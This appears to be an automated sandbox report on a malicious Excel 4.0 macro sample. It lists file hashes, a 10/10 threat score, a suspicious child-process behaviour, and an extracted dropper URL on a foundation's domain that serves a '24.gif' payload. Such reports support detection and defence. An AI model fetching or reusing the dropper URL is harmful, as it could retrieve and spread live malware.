General

  • Target

    d91023950ba37d19b2668deefae370d0_JaffaCakes118

  • Size

    50KB

  • Sample

    240910-1czwtswdpj

  • MD5

    d91023950ba37d19b2668deefae370d0

  • SHA1

    09ce36cce76ef3dc51953b04f784637681cc7616

  • SHA256

    11bc50af49acfd081f56f7b0702e1793cad368b49574aa93d3ad39668109a9a9

  • SHA512

    1f2407539d844d356c87e2d5766f191548cdc26d9d787b900264ff077c3391aae90f287360395eaf1d2c7a8dec4ac6465f5b72c9f3a77e1a9a88c5cadd5ec6b3

  • SSDEEP

    1536:8/7uDphYHceXVhca+fMHLtyeGxcl8/dgmD6yzsF6BCKhOkF+QN:8/7uDphYHceXVhca+fMHLtyeGxcl8/dx

Score
10/10

Malware Config

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://foundation.shanto-mariamfoundation.org/24.gif

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://foundation.shanto-mariamfoundation.org/24.gif

Targets

    • Target

      d91023950ba37d19b2668deefae370d0_JaffaCakes118

    • Size

      50KB

    • MD5

      d91023950ba37d19b2668deefae370d0

    • SHA1

      09ce36cce76ef3dc51953b04f784637681cc7616

    • SHA256

      11bc50af49acfd081f56f7b0702e1793cad368b49574aa93d3ad39668109a9a9

    • SHA512

      1f2407539d844d356c87e2d5766f191548cdc26d9d787b900264ff077c3391aae90f287360395eaf1d2c7a8dec4ac6465f5b72c9f3a77e1a9a88c5cadd5ec6b3

    • SSDEEP

      1536:8/7uDphYHceXVhca+fMHLtyeGxcl8/dgmD6yzsF6BCKhOkF+QN:8/7uDphYHceXVhca+fMHLtyeGxcl8/dx

    Score
    10/10
    • Process spawned suspicious child process

      This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

MITRE ATT&CK Enterprise v15

Tasks